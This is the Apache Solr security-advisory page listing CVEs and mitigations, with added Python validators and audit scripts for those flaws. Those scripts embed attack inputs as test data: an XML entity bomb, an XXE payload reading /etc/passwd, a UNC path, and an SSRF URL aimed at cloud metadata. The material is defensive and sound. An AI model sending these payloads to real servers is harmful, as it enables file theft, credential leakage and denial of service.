CVE-2021-44548: Solr™ Security News
How to report a security issue
If you believe you have discovered a vulnerability in Solr, you may first want to consult the list of known false positives to make sure you are reporting a real vulnerability. Then please disclose responsibly by following these ASF guidelines for reporting.
You may file your request by email to [email protected].
More information
You will find more security related information on our Wiki: https://cwiki.apache.org/confluence/display/SOLR/SolrSecurity, such as information on how to treat the automated reports from security scanning tools.
Recent CVE reports for Apache Solr
Below is a list of already announced CVE vulnerabilities. These are also available as an ATOM feed.
CVE#            Date        Announcement
CVE-2021-44548  2021-12-18  Apache Solr information disclosure vulnerability through DataImportHandler
CVE-2021-44228  2021-12-10  Apache Solr affected by Apache Log4J CVE-2021-44228
CVE-2021-27905  2021-04-12  SSRF vulnerability with the Replication handler
CVE-2021-29262  2021-04-12  Misapplied Zookeeper ACLs can result in leakage of configured authentication and authorization settings
CVE-2021-29943  2021-04-12  Apache Solr Unprivileged users may be able to perform unauthorized read/write to collections
CVE-2020-13957  2020-10-12  The checks added to unauthenticated configset uploads in Apache Solr can be circumvented
CVE-2020-13941  2020-08-14  Apache Solr information disclosure vulnerability
CVE-2019-17558  2019-12-30  Apache Solr RCE through VelocityResponseWriter
CVE-2019-12409  2019-11-18  Apache Solr RCE vulnerability due to bad config default
CVE-2019-12401  2019-09-09  XML Bomb in Apache Solr versions prior to 5.0
(no CVE)        2019-08-14  [ANNOUNCE] 8.1.1 and 8.2.0 users check ENABLE_REMOTE_JMX_OPTS setting
CVE-2019-0193   2019-07-31  Apache Solr, Remote Code Execution via DataImportHandler
CVE-2019-0192   2019-03-06  Deserialization of untrusted data via jmx.serviceUrl in Apache Solr
CVE-2017-3164   2019-02-12  SSRF issue in Apache Solr
CVE-2018-1308   2018-04-08  XXE attack through Apache Solr’s DIH’s dataConfig request parameter
2021-12-18, CVE-2021-44548: Apache Solr information disclosure vulnerability through DataImportHandler ¶
Severity:
Moderate
Versions Affected:
All versions prior to 8.11.1. Affected platforms: Windows.
Description:
An Improper Input Validation vulnerability in DataImportHandler of Apache Solr allows an attacker to provide a Windows UNC path resulting in an SMB network call being made from the Solr host to another host on the network. If the attacker has wider access to the network, this may lead to SMB attacks, which may result in:
- The exfiltration of sensitive data such as OS user hashes (NTLM/LM hashes),
- In case of misconfigured systems, SMB Relay Attacks which can lead to user impersonation on SMB Shares or, in a worst-case scenario, Remote Code Execution
This issue affects all Apache Solr versions prior to 8.11.1. This issue only affects Windows.
Mitigation:
Upgrade to Solr 8.11.1, and/or ensure only trusted clients can make requests to Solr’s DataImport handler.
Credit:
Apache Solr would like to thank LaiHan of the Nsfocus security team for reporting the issue.
References:
Jira issue SOLR-15826
2021-12-10, Apache Solr affected by Apache Log4J CVE-2021-44228 ¶
Severity: Critical
Versions Affected: 7.4.0 to 7.7.3, 8.0.0 to 8.11.0
Description: Apache Solr releases prior to 8.11.1 were using a bundled version of the Apache Log4J library vulnerable to RCE. For full impact and additional detail consult the Log4J security page.
Apache Solr releases prior to 7.4 (i.e. Solr 5, Solr 6, and Solr 7 through 7.3) use Log4J 1.2.17 which may be vulnerable for installations using non-default logging configurations that include the JMS Appender, see https://github.com/apache/logging-log4j2/pull/608#issuecomment-990494126 for discussion.
Solr’s Prometheus Exporter uses Log4J as well but it does not log user input or data, so we don’t see a risk there.
Solr is not vulnerable to the followup CVE-2021-45046 and CVE-2021-45105. A listing of these and other CVEs with some justifications are listed in Solr’s wiki: https://cwiki.apache.org/confluence/display/SOLR/SolrSecurity#SolrSecurity-SolrandVulnerabilityScanningTools
Mitigation: Any of the following are enough to prevent this vulnerability for Solr servers:
- Upgrade to Solr 8.11.1 or greater (when available), which will include an updated version (>= 2.16.0) of the Log4J dependency.
- If you are using Solr’s official docker image, it has already been mitigated in all versions listed as supported on Docker Hub: https://hub.docker.com/_/solr. You may need to re-pull the image.
- Manually update the version of Log4J on your runtime classpath and restart your Solr application.
- (Linux/MacOS) Edit your solr.in.sh file to include: SOLR_OPTS="$SOLR_OPTS -Dlog4j2.formatMsgNoLookups=true"
- (Windows) Edit your solr.in.cmd file to include: set SOLR_OPTS=%SOLR_OPTS% -Dlog4j2.formatMsgNoLookups=true
- Follow any of the other mitigations listed at https://logging.apache.org/log4j/2.x/security.html
The Log4J security page refers to setting log4j2.formatMsgNoLookups=true as a “discredited” mitigation. In reality, it depends. We’ve looked at the root cause and audited the code paths that lead to the vulnerability, and we feel confident in this mitigation being sufficient for Solr. See https://lists.apache.org/thread/kgh63sncrsm2bls884pg87mnt8vqztmz for discussion.
References: https://logging.apache.org/log4j/2.x/security.html
2021-04-12, CVE-2021-27905: SSRF vulnerability with the Replication handler ¶
Severity: High
Versions Affected: 7.0.0 to 7.7.3, 8.0.0 to 8.8.1
Description: The ReplicationHandler (normally registered at “/replication” under a Solr core) has a “masterUrl” (also “leaderUrl” alias) parameter that is used to designate another ReplicationHandler on another Solr core to replicate index data into the local core. To prevent a SSRF vulnerability, Solr ought to check these parameters against a similar configuration it uses for the “shards” parameter. Prior to this bug getting fixed, it did not.
Mitigation: Any of the following are enough to prevent this vulnerability:
- Upgrade to Solr 8.8.2 or greater.
- If upgrading is not an option, consider applying the patch in SOLR-15217
- Ensure that any access to the replication handler is purely internal to Solr. Typically, it’s only accessed externally for diagnostic/informational purposes.
Credit: Reported by Caolinhong(Skay) from QI-ANXIN Cert (QI-ANXIN Technology Group Inc.)
References: SOLR-15217: CVE-2021-27905: SSRF vulnerability with the Replication handler
2021-04-12, CVE-2021-29262: Misapplied Zookeeper ACLs can result in leakage of configured authentication and authorization settings ¶
Severity: High
Versions Affected: 7.0.0 to 7.7.3, 8.0.0 to 8.8.1
Description: When starting Apache Solr versions prior to 8.8.2, configured with the SaslZkACLProvider or VMParamsAllAndReadonlyDigestZkACLProvider and no existing security.json znode, if the optional read-only user is configured then Solr would not treat that node as a sensitive path and would allow it to be readable. Additionally, with any ZkACLProvider, if the security.json is already present, Solr will not automatically update the ACLs.
Mitigation: Any of the following are enough to prevent this vulnerability:
- Manually set appropriate ACLs on /security.json znode.
- Upgrade to Solr 8.8.2 or greater.
- If upgrading is not an option, consider applying the patch in SOLR-15249
- Ensure that any access to ZooKeeper is only by trusted applications.
Credit: Timothy Potter and Mike Drob, Apple Cloud Services
References: SOLR-15249: CVE-2021-29262: Misapplied Zookeeper ACLs can result in leakage of configured authentication and authorization settings
2021-04-12, CVE-2021-29943: Apache Solr Unprivileged users may be able to perform unauthorized read/write to collections ¶
Severity: High
Versions Affected: 7.0.0 to 7.7.3, 8.0.0 to 8.8.1
Description: When using ConfigurableInternodeAuthHadoopPlugin for authentication, Apache Solr versions prior to 8.8.2 would forward/proxy distributed requests using server credentials instead of original client credentials. This would result in incorrect authorization resolution on the receiving hosts.
Mitigation: Any of the following are enough to prevent this vulnerability:
- Upgrade to Solr 8.8.2 or greater.
- If upgrading is not an option, consider applying the patch in SOLR-15233
- Use a different authentication plugin, such as the KerberosPlugin or HadoopAuthPlugin
Credit: Geza Nagy
References: SOLR-15233: CVE-2021-29943: Apache Solr Unprivileged users may be able to perform unauthorized read/write to collections
2020-10-12, CVE-2020-13957: The checks added to unauthenticated configset uploads in Apache Solr can be circumvented ¶
Severity: High
Versions Affected: 6.6.0 to 6.6.6, 7.0.0 to 7.7.3, 8.0.0 to 8.6.2
Description: Solr prevents some features considered dangerous (which could be used for remote code execution) from being configured in a ConfigSet that’s uploaded via API without authentication/authorization. The checks in place to prevent such features can be circumvented by using a combination of UPLOAD/CREATE actions.
Mitigation: Any of the following are enough to prevent this vulnerability:
- Disable UPLOAD command in ConfigSets API if not used by setting the system property: configset.upload.enabled to false (see docs)
- Use Authentication/Authorization and make sure unknown requests aren’t allowed (see docs)
- Upgrade to Solr 8.6.3 or greater.
- If upgrading is not an option, consider applying the patch in SOLR-14663
- No Solr API, including the Admin UI, is designed to be exposed to non-trusted parties. Tune your firewall so that only trusted computers and people are allowed access
Credit: Tomás Fernández Löbbe, András Salamon
References: SOLR-14925: CVE-2020-13957: The checks added to unauthenticated configset uploads can be circumvented
2020-08-14, CVE-2020-13941: Apache Solr information disclosure vulnerability ¶
Severity: Medium
Versions Affected:
Before Solr 8.6. Some risks are specific to Windows.
Description: Reported in SOLR-14515 (private) and fixed in SOLR-14561 (public), released in Solr version 8.6.0. The Replication handler (https://solr.apache.org/guide/8_6/index-replication.html#http-api-commands-for-the-replicationhandler) allows the commands backup, restore and deleteBackup. Each of these takes a location parameter, which was not validated, i.e. you could read/write to any location the solr user can access.
On a Windows system SMB paths such as \\10.0.0.99\share\folder may also be used, leading to:
- The possibility of restoring another SolrCore from a server on the network (or a mounted remote file system), which may lead to:
  - Exposing search index data that the attacker should otherwise not have access to
  - Replacing the index data entirely by loading it from a remote file system that the attacker controls
- Launching SMB attacks, which may result in:
  - The exfiltration of sensitive data such as OS user hashes (NTLM/LM hashes),
  - In case of misconfigured systems, SMB Relay Attacks which can lead to user impersonation on SMB Shares or, in a worst-case scenario, Remote Code Execution
Mitigation: Upgrade to Solr 8.6, and/or ensure only trusted clients can make requests of Solr’s replication handler.
Credit: Matei “Mal” Badanoiu
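The validation that CVE-2020-13941 describes as missing for the location parameter, which would also have refused the UNC paths of CVE-2021-44548 above, written out as an added Python example. This is not Solr's code: the backup root /var/solr/backups, the policy of only accepting a subdirectory of that root, and the function names are assumptions of the example.

```python
from pathlib import Path, PureWindowsPath


class UnsafeLocation(ValueError):
    """Raised when a client-supplied location must not be used."""


def is_unc_or_drive_path(location: str) -> bool:
    """True for Windows UNC paths (\\\\host\\share or //host/share) and
    drive-letter paths (C:\\...).

    Handing any of these to the file system makes the Solr host open an
    SMB connection (UNC) or leave the backup root (drive letter).
    """
    stripped = location.strip()
    if stripped.startswith(("\\\\", "//")):
        return True
    # PureWindowsPath parses Windows syntax on any OS. .drive is
    # '\\\\host\\share' for a UNC path, 'C:' for a drive letter, '' otherwise.
    return PureWindowsPath(stripped).drive != ""


def resolve_backup_location(location: str, backup_root: str) -> Path:
    """Return the absolute directory a backup/restore may use, or raise.

    Policy (an assumption of this example, not Solr's): the location must
    be a non-empty relative name without backslashes, must not be a UNC or
    drive path, and after '..' and symlinks are resolved it must still be a
    subdirectory of backup_root.
    """
    if not location or not location.strip():
        raise UnsafeLocation("empty location")
    if is_unc_or_drive_path(location):
        raise UnsafeLocation(f"UNC or drive path rejected: {location!r}")
    if "\\" in location:
        raise UnsafeLocation(f"backslash rejected: {location!r}")
    root = Path(backup_root).resolve()
    # Joining discards root when location is absolute, and resolve()
    # collapses '..' and follows symlinks, so the containment test below
    # sees the path the OS would actually open.
    candidate = (root / location).resolve()
    if root not in candidate.parents:
        raise UnsafeLocation(f"location escapes {backup_root}: {location!r}")
    return candidate


if __name__ == "__main__":
    for loc in ["2021-12-18/core1", "\\\\10.0.0.99\\share\\folder",
                "../../etc/passwd", "/etc/passwd", "."]:
        try:
            print(f"{loc!r:35} -> {resolve_backup_location(loc, '/var/solr/backups')}")
        except UnsafeLocation as err:
            print(f"{loc!r:35} -> rejected ({err})")
```

The UNC test is deliberately separate from the containment test: a UNC path is rejected before anything touches the file system, because on Windows even resolving `\\host\share` is enough to trigger the outbound SMB connection the advisory warns about.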
2019-12-30, CVE-2019-17558: Apache Solr RCE through VelocityResponseWriter ¶
Severity: High
Vendor:
The Apache Software Foundation
Versions Affected: 5.0.0 to 8.3.1
Description:
The affected versions are vulnerable to Remote Code Execution through the VelocityResponseWriter. A Velocity template can be provided either as a file in a configset’s velocity/ directory or as a request parameter. A user-defined configset could contain renderable, potentially malicious, templates. Parameter-provided templates are disabled by default, but can be enabled by defining a response writer with params.resource.loader.enabled set to true. Defining a response writer requires Config API access.
Solr 8.4 removed the params resource loader entirely, and only enables the configset-provided template rendering when the configset is trusted (has been uploaded by an authenticated user).
Mitigation:
Ensure your network settings are configured so that only trusted traffic communicates with Solr, especially to the configuration APIs.
Credit:
Github user s00py
References:
- https://issues.apache.org/jira/browse/SOLR-13971
- https://issues.apache.org/jira/browse/SOLR-14025
- https://cwiki.apache.org/confluence/display/SOLR/SolrSecurity
2019-11-18, CVE-2019-12409: Apache Solr RCE vulnerability due to bad config default ¶
Severity: High
Vendor:
The Apache Software Foundation
Versions Affected:
Solr 8.1.1 and 8.2.0 for Linux
Description:
The 8.1.1 and 8.2.0 releases of Apache Solr contain an insecure setting for the ENABLE_REMOTE_JMX_OPTS configuration option in the default solr.in.sh configuration file shipping with Solr.
Windows users are not affected.
If you use the default solr.in.sh file from the affected releases, then JMX monitoring will be enabled and exposed on RMI_PORT (default=18983), without any authentication. If this port is opened for inbound traffic in your firewall, then anyone with network access to your Solr nodes will be able to access JMX, which may in turn allow them to upload malicious code for execution on the Solr server.
The vulnerability is already public [1] and mitigation steps were announced on project mailing lists and news page [3] on August 14th, without mentioning RCE at that time.
Mitigation:
Make sure your effective solr.in.sh file has ENABLE_REMOTE_JMX_OPTS set to ‘false’ on every Solr node and then restart Solr. Note that the effective solr.in.sh file may reside in /etc/default/ or another location depending on the install. You can then validate that the ‘com.sun.management.jmxremote*’ family of properties is not listed in the “Java Properties” section of the Solr Admin UI, or is configured in a secure way.
There is no need to upgrade or update any code.
Remember to follow the Solr Documentation’s advice to never expose Solr nodes directly in a hostile network environment.
Credit:
Matei “Mal” Badanoiu
Solr JIRA user ‘jnyryan’ (John)
References:
[1] https://issues.apache.org/jira/browse/SOLR-13647
[3] https://solr.apache.org/news.html
2019-09-09, CVE-2019-12401: XML Bomb in Apache Solr versions prior to 5.0 ¶
Severity: Medium
Vendor:
The Apache Software Foundation
Versions Affected:
- 1.3.0 to 1.4.1
- 3.1.0 to 3.6.2
- 4.0.0 to 4.10.4
Description:
Solr versions prior to 5.0.0 are vulnerable to an XML resource consumption attack (a.k.a. Billion Laughs or “lol bomb”) via its update handler. By leveraging XML DOCTYPE and ENTITY type elements, the attacker can create a pattern that expands when the server parses the XML, causing out-of-memory errors.
Mitigation:
- Upgrade to Apache Solr 5.0 or later.
- Ensure your network settings are configured so that only trusted traffic is allowed to post documents to the running Solr instances.
Credit:
Matei “Mal” Badanoiu
References:
- https://issues.apache.org/jira/browse/SOLR-13750
- https://cwiki.apache.org/confluence/display/SOLR/SolrSecurity
2019-08-14, [ANNOUNCE] 8.1.1 and 8.2.0 users check ENABLE_REMOTE_JMX_OPTS setting ¶
Severity: Low
Versions Affected: 8.1.1 and 8.2.0 for Linux
Description: It has been discovered [1] that the 8.1.1 and 8.2.0 releases contain a bad default setting for the ENABLE_REMOTE_JMX_OPTS setting in the default solr.in.sh file shipping with Solr.
Windows users and users with custom solr.in.sh files are not affected.
If you are using the default solr.in.sh file from the affected releases, then JMX monitoring will be enabled and exposed on RMI_PORT (default = 18983), without any authentication. So if your firewall allows inbound traffic on RMI_PORT, then anyone with network access to your Solr nodes will be able to access monitoring data exposed over JMX.
Mitigation: Edit solr.in.sh, set ENABLE_REMOTE_JMX_OPTS=false and restart Solr. Alternatively wait for the future 8.3.0 release and upgrade.
References: [1] https://issues.apache.org/jira/browse/SOLR-13647
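An audit of the effective solr.in.sh settings, covering both the Log4J mitigation in the 2021-12-10 advisory above (the formatMsgNoLookups flag in SOLR_OPTS, or a log4j-core jar at 2.16.0 or later) and the ENABLE_REMOTE_JMX_OPTS default from the two JMX advisories above, as an added Python example. This is not Solr's code; the sample solr.in.sh and the jar placed under server/lib/ext are constructed for the demonstration, and the parser only understands plain shell assignments (no command substitution or conditionals).

```python
import re
import tempfile
from pathlib import Path

# Constructed sample (not a file shipped by Solr): the 8.1.1/8.2.0 JMX
# default is present, and the Log4J flag has been appended to SOLR_OPTS.
SAMPLE_SOLR_IN_SH = """\
SOLR_HEAP="512m"
#ENABLE_REMOTE_JMX_OPTS="false"
ENABLE_REMOTE_JMX_OPTS="true"
RMI_PORT=18983
SOLR_OPTS="$SOLR_OPTS -Dsolr.autoSoftCommit.maxTime=3000"
SOLR_OPTS="$SOLR_OPTS -Dlog4j2.formatMsgNoLookups=true"
"""

# A plain shell assignment, optionally prefixed with 'export'.
_ASSIGN = re.compile(r"^(?:export\s+)?([A-Za-z_][A-Za-z0-9_]*)=(.*)$")
_LOG4J_CORE = re.compile(r"^log4j-core-(\d+)\.(\d+)\.(\d+)\.jar$")


def parse_solr_in_sh(text: str) -> dict:
    """Effective value of every variable assigned in a solr.in.sh.

    Comment lines are skipped, the last assignment wins, one layer of
    quotes is stripped, and "$SOLR_OPTS"/"${SOLR_OPTS}" inside a SOLR_OPTS
    assignment is replaced by the value accumulated so far, so flags added
    on separate lines are all seen.
    """
    effective = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = _ASSIGN.match(line)
        if not m:
            continue
        name, value = m.group(1), m.group(2).strip()
        if len(value) >= 2 and value[0] == value[-1] and value[0] in "\"'":
            value = value[1:-1]
        if name == "SOLR_OPTS":
            previous = effective.get("SOLR_OPTS", "")
            value = value.replace("${SOLR_OPTS}", previous).replace("$SOLR_OPTS", previous)
        effective[name] = value.strip()
    return effective


def jmx_exposed(effective: dict) -> bool:
    """True when ENABLE_REMOTE_JMX_OPTS is 'true' (the bad 8.1.1/8.2.0 default)."""
    return effective.get("ENABLE_REMOTE_JMX_OPTS", "false").lower() == "true"


def log4j_lookups_disabled(effective: dict) -> bool:
    return "-Dlog4j2.formatMsgNoLookups=true" in effective.get("SOLR_OPTS", "").split()


def log4j_core_versions(lib_dir) -> list:
    """Sorted (major, minor, patch) tuples for every log4j-core jar under lib_dir."""
    found = []
    for jar in Path(lib_dir).rglob("log4j-core-*.jar"):
        m = _LOG4J_CORE.match(jar.name)
        if m:
            found.append(tuple(int(x) for x in m.groups()))
    return sorted(found)


def audit(solr_in_sh, lib_dir) -> dict:
    """Combine the checks. Log4J counts as handled by either a >= 2.16.0 jar
    or the formatMsgNoLookups flag, as the advisory above states."""
    eff = parse_solr_in_sh(Path(solr_in_sh).read_text())
    versions = log4j_core_versions(lib_dir)
    flag = log4j_lookups_disabled(eff)
    return {
        "jmx_exposed": jmx_exposed(eff),
        "rmi_port": eff.get("RMI_PORT", "18983"),
        "log4j_core_versions": versions,
        "log4j_lookups_disabled": flag,
        "log4j_ok": flag or (bool(versions) and all(v >= (2, 16, 0) for v in versions)),
    }


def demo() -> dict:
    """Build a constructed install layout in a temp dir and audit it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "solr.in.sh").write_text(SAMPLE_SOLR_IN_SH)
        lib = root / "server" / "lib" / "ext"
        lib.mkdir(parents=True)
        (lib / "log4j-core-2.14.1.jar").touch()   # constructed: an unpatched jar name
        return audit(root / "solr.in.sh", root / "server")


if __name__ == "__main__":
    print(demo())
```

Run it against the solr.in.sh the service actually sources (for example /etc/default/solr.in.sh on a package install) and the node's server/ directory; a result with jmx_exposed true on a node whose RMI_PORT is reachable is the condition both JMX advisories describe.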
2019-07-31, CVE-2019-0193: Apache Solr, Remote Code Execution via DataImportHandler ¶
Severity: High
Vendor:
The Apache Software Foundation
Versions Affected:
- 5.0.0 to 5.5.5
- 6.0.0 to 6.6.5
Description:
The DataImportHandler, an optional but popular module to pull in data from databases and other sources, has a feature in which the whole DIH configuration can come from a request’s “dataConfig” parameter. The debug mode of the DIH admin screen uses this to allow convenient debugging / development of a DIH config. Since a DIH config can contain scripts, this parameter is a security risk. Starting with version 8.2.0 of Solr, use of this parameter requires setting the Java System property enable.dih.dataConfigParam to true.
Mitigation:
- Upgrade to 8.2.0 or later, which is secure by default.
- or, edit solrconfig.xml to configure all DataImportHandler usages with an “invariants” section listing the “dataConfig” parameter set to an empty string.
- Ensure your network settings are configured so that only trusted traffic communicates with Solr, especially to the DIH request handler. This is a best practice for all of Solr.
Credit:
Michael Stepankin (JPMorgan Chase)
References:
- https://issues.apache.org/jira/browse/SOLR-13669
- https://cwiki.apache.org/confluence/display/SOLR/SolrSecurity
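A check that every DataImportHandler in a solrconfig.xml carries the invariants mitigation from the list above, as an added Python example (not Solr's code). The solrconfig.xml fragment is constructed for the example, and the only Solr-specific fact it relies on is that a parameter set in an invariants block cannot be overridden by a request.

```python
import xml.etree.ElementTree as ET

DIH_CLASS = "org.apache.solr.handler.dataimport.DataImportHandler"

# Constructed solrconfig.xml fragment (not a file shipped by Solr): the first
# handler carries the mitigation from the advisory, the second does not.
SAMPLE_SOLRCONFIG = f"""\
<config>
  <requestHandler name="/dataimport" class="{DIH_CLASS}">
    <lst name="defaults">
      <str name="config">data-config.xml</str>
    </lst>
    <lst name="invariants">
      <str name="dataConfig"></str>
    </lst>
  </requestHandler>
  <requestHandler name="/dataimport-products" class="{DIH_CLASS}">
    <lst name="defaults">
      <str name="config">products-config.xml</str>
    </lst>
  </requestHandler>
  <requestHandler name="/select" class="solr.SearchHandler"/>
</config>
"""


def dih_handlers(root):
    """Every <requestHandler> whose class is the DataImportHandler."""
    for handler in root.iter("requestHandler"):
        if handler.get("class", "").endswith("DataImportHandler"):
            yield handler


def data_config_pinned(handler) -> bool:
    """True when an invariants block fixes dataConfig to the empty string.

    Invariants override request parameters, so a client-supplied
    dataConfig is ignored. An empty <str/> parses with text None, which
    counts as empty here.
    """
    for lst in handler.findall("lst"):
        if lst.get("name") != "invariants":
            continue
        for s in lst.findall("str"):
            if s.get("name") == "dataConfig" and not (s.text or "").strip():
                return True
    return False


def audit_solrconfig(xml_text: str) -> dict:
    """Map each DIH handler name to whether its dataConfig parameter is pinned."""
    root = ET.fromstring(xml_text)
    return {h.get("name"): data_config_pinned(h) for h in dih_handlers(root)}


if __name__ == "__main__":
    for name, pinned in audit_solrconfig(SAMPLE_SOLRCONFIG).items():
        print(f"{name}: {'dataConfig pinned' if pinned else 'dataConfig ACCEPTED FROM REQUESTS'}")
```

Handlers reported as unpinned still accept a dataConfig parameter on versions before 8.2.0; on 8.2.0 and later the parameter is off unless enable.dih.dataConfigParam is set, so check that system property as well.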
2019-03-06, CVE-2019-0192: Deserialization of untrusted data via jmx.serviceUrl in Apache Solr ¶
Severity: High
Vendor:
The Apache Software Foundation
Versions Affected:
- 5.0.0 to 5.5.5
- 6.0.0 to 6.6.5
Description:
The Config API allows configuring Solr’s JMX server via an HTTP POST request. By pointing it to a malicious RMI server, an attacker could take advantage of Solr’s unsafe deserialization to trigger remote code execution on the Solr side.
Mitigation:
Any of the following are enough to prevent this vulnerability:
- Upgrade to Apache Solr 7.0 or later.
- Disable the ConfigAPI if not in use, by running Solr with the system property “disable.configEdit=true”
- If upgrading or disabling the Config API are not viable options, apply patch in [1] and re-compile Solr.
- Ensure your network settings are configured so that only trusted traffic is allowed to ingress/egress your hosts running Solr.
Credit:
Michael Stepankin
References:
- https://issues.apache.org/jira/browse/SOLR-13301
- https://cwiki.apache.org/confluence/display/SOLR/SolrSecurity
2019-02-12, CVE-2017-3164: SSRF issue in Apache Solr ¶
Severity: High
Vendor:
The Apache Software Foundation
Versions Affected: Apache Solr versions from 1.3 to 7.6.0
Description:
The “shards” parameter does not have a corresponding whitelist mechanism, so it can request any URL.
Mitigation:
Upgrade to Apache Solr 7.7.0 or later. Ensure your network settings are configured so that only trusted traffic is allowed to ingress/egress your hosts running Solr.
Credit:
dk from Chaitin Tech
References:
- https://issues.apache.org/jira/browse/SOLR-12770
- https://cwiki.apache.org/confluence/display/SOLR/SolrSecurity
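The host:port allowlist check that the CVE-2017-3164 advisory above says was missing for the shards parameter, and that the CVE-2021-27905 advisory says was missing for the replication handler's masterUrl/leaderUrl parameter, as an added Python example. This is not Solr's implementation; the comma-separated host:port allowlist format is an assumption of the example, and the hostnames and URLs are made up.

```python
from urllib.parse import urlsplit


class DisallowedShardUrl(ValueError):
    """Raised when a client-supplied Solr URL is not on the allowlist."""


def parse_allowlist(value: str) -> frozenset:
    """Parse a comma-separated 'host:port,host:port' string into a set.

    Entries are lower-cased so that comparison is case-insensitive.
    """
    return frozenset(e.strip().lower() for e in value.split(",") if e.strip())


def check_shard_url(url: str, allowlist: frozenset) -> str:
    """Return the normalised 'host:port' of url if it may be contacted.

    Rejects non-http(s) schemes, URLs with userinfo (so that
    http://good:8983@evil/ cannot pass a prefix check), missing hosts,
    malformed ports, and any host:port not in the allowlist. The port is
    compared explicitly, defaulting to 80/443 from the scheme when absent.
    """
    parts = urlsplit(url.strip())
    if parts.scheme not in ("http", "https"):
        raise DisallowedShardUrl(f"scheme not allowed: {url!r}")
    if parts.username is not None or parts.password is not None:
        raise DisallowedShardUrl(f"userinfo not allowed: {url!r}")
    host = parts.hostname          # lower-cased; brackets stripped from IPv6
    if not host:
        raise DisallowedShardUrl(f"no host: {url!r}")
    try:
        port = parts.port
    except ValueError as err:
        raise DisallowedShardUrl(f"bad port: {url!r}") from err
    if port is None:
        port = 443 if parts.scheme == "https" else 80
    if ":" in host:                # IPv6 literal: restore brackets
        host = f"[{host}]"
    key = f"{host}:{port}"
    if key not in allowlist:
        raise DisallowedShardUrl(f"{key} not in allowlist")
    return key


if __name__ == "__main__":
    allow = parse_allowlist("solr1.internal:8983,solr2.internal:8983")
    for candidate in ["http://solr1.internal:8983/solr/core1/replication",
                      "http://solr1.internal:8983@169.254.169.254/latest/meta-data/",
                      "http://169.254.169.254/latest/meta-data/"]:
        try:
            print(candidate, "->", check_shard_url(candidate, allow))
        except DisallowedShardUrl as err:
            print(candidate, "-> rejected:", err)
```

Matching on the parsed host and port, rather than on a string prefix, is the point: the second candidate in the demo starts with an allowed host but its real host is the cloud metadata address, which is exactly the target an SSRF through shards or masterUrl would aim at.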
2018-04-08, CVE-2018-1308: XXE attack through Apache Solr’s DIH’s dataConfig request parameter ¶
Severity: Major
Vendor:
The Apache Software Foundation
Versions Affected:
- Solr 1.2 to 6.6.2
- Solr 7.0.0 to 7.2.1
Description:
The details of this vulnerability were reported to the Apache Security mailing list.
This vulnerability relates to an XML external entity expansion (XXE) in the &dataConfig=<inlinexml> parameter of Solr’s DataImportHandler. It can be used as XXE using file/ftp/http protocols in order to read arbitrary local files from the Solr server or the internal network. See [1] for more details.
Mitigation:
Users are advised to upgrade to either Solr 6.6.3 or Solr 7.3.0, both of which address the vulnerability. Once the upgrade is complete, no other steps are required. Those releases disable external entities in anonymous XML passed through this request parameter.
If users are unable to upgrade to Solr 6.6.3 or Solr 7.3.0, they are advised to disable the DataImportHandler in their solrconfig.xml file and restart their Solr instances. Alternatively, if Solr instances are only used locally without access to the public internet, the vulnerability cannot be used directly, so it may not be required to update; instead, reverse proxies or Solr client applications should be guarded so that end users cannot inject dataConfig request parameters. Please refer to [2] on how to correctly secure Solr servers.
Credit:
麦 香浓郁
References:
[1] https://issues.apache.org/jira/browse/SOLR-11971
[2] https://cwiki.apache.org/confluence/display/solr/SolrSecurity
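The XML parsing behind the XML-bomb (CVE-2019-12401) and XXE (CVE-2018-1308) advisories above, shown as an added Python example: the vulnerable expansion next to a hardened parser that refuses any DOCTYPE, which is the effect of the "disable external entities" fix those releases made. This is not Solr's code, and both payloads are constructed and kept deliberately small.

```python
import xml.etree.ElementTree as ET
import xml.parsers.expat


class UnsafeXML(ValueError):
    """Raised when a document carries a DOCTYPE."""


# Constructed payloads. The bomb is kept to three levels (100x) so it is
# safe to expand here; the classic version nests ten levels for ~10^9.
LOL_BOMB = """<?xml version="1.0"?>
<!DOCTYPE lolz [
 <!ENTITY lol "lol">
 <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
 <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
]>
<lolz>&lol2;</lolz>"""

XXE = """<?xml version="1.0"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<foo>&xxe;</foo>"""

BENIGN = '<add><doc><field name="id">1</field></doc></add>'


def expanded_text_length(data: str) -> int:
    """Unhardened path: ElementTree expands internal entities, so this is
    the number of characters the server materialises for the document."""
    return len(ET.fromstring(data).text or "")


def amplification(data: str) -> float:
    """Expanded characters per input character; above 1 means a size limit
    on the request body is not a defence."""
    return expanded_text_length(data) / len(data)


def reject_doctype(data: str) -> None:
    """Raise UnsafeXML if the document declares a DOCTYPE.

    Without a DOCTYPE there is nowhere to declare entities, which shuts
    down both entity-expansion bombs and external (XXE) entities; this is
    the same rule that DTD-disabling parser features enforce.
    """
    parser = xml.parsers.expat.ParserCreate()

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise UnsafeXML(f"DOCTYPE {name!r} is not allowed")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.Parse(data, True)


def parse_untrusted(data: str):
    """Hardened path: refuse any DOCTYPE, then parse normally."""
    reject_doctype(data)
    return ET.fromstring(data)


if __name__ == "__main__":
    print("bomb expands to", expanded_text_length(LOL_BOMB), "chars,",
          f"{amplification(LOL_BOMB):.1f}x the input")
    for label, doc in [("benign", BENIGN), ("bomb", LOL_BOMB), ("xxe", XXE)]:
        try:
            print(label, "->", parse_untrusted(doc).tag)
        except UnsafeXML as err:
            print(label, "-> rejected:", err)
```

The rejection is deliberately coarse: any DOCTYPE, even one with no entity declarations, is refused, because an update or dataConfig document has no legitimate need for one and a narrower rule (only blocking SYSTEM entities, say) leaves the internal-subset expansion path open.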
Related news
A researcher claims to have found a decade-old vulnerability rated 9.9 that affects all GNU/Linux systems, allowing attackers…
While distilling risk down to a simple numerical score is helpful for many in the security space, it is also an imperfect system that can often leave out important context.
An issue was discovered in the function gdev_prn_open_printer_seekable() in Artifex Ghostscript through 10.02.0 allows remote attackers to crash the application via a dangling pointer.
